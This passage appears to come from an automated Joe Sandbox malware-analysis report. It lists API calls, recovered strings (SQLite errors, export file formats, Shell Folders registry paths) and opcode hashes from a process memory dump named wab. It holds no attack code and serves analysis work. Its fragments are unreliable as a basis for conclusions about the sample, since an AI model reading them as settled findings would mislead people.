                                                                                                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1973883786-0
                                                                                                                                                • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004185FC
                                                                                                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@AttributesFilememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776155459-0
                                                                                                                                                • Opcode ID: 7a9323aad94e24d1be4080513bc7e6f3ed6a266ca59275ba5ce2a6d3a44692dd
                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                • Opcode Fuzzy Hash: 7a9323aad94e24d1be4080513bc7e6f3ed6a266ca59275ba5ce2a6d3a44692dd
                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2308052813-0
                                                                                                                                                • Opcode ID: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                • Opcode Fuzzy Hash: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PathTemp$??3@
                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                • API String ID: 1589464350-1420421710
                                                                                                                                                • Opcode ID: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                • Opcode Fuzzy Hash: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                • String ID: General
                                                                                                                                                • API String ID: 999786162-26480598
                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                • API String ID: 0-1953309616
                                                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: fdaf7c221553fa3d99baedce4f360f1f5535380ea0dd65d5a88a596ccf078b3c
                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                • Opcode Fuzzy Hash: fdaf7c221553fa3d99baedce4f360f1f5535380ea0dd65d5a88a596ccf078b3c
                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2903831945-0
                                                                                                                                                • Opcode ID: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                • Opcode Fuzzy Hash: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
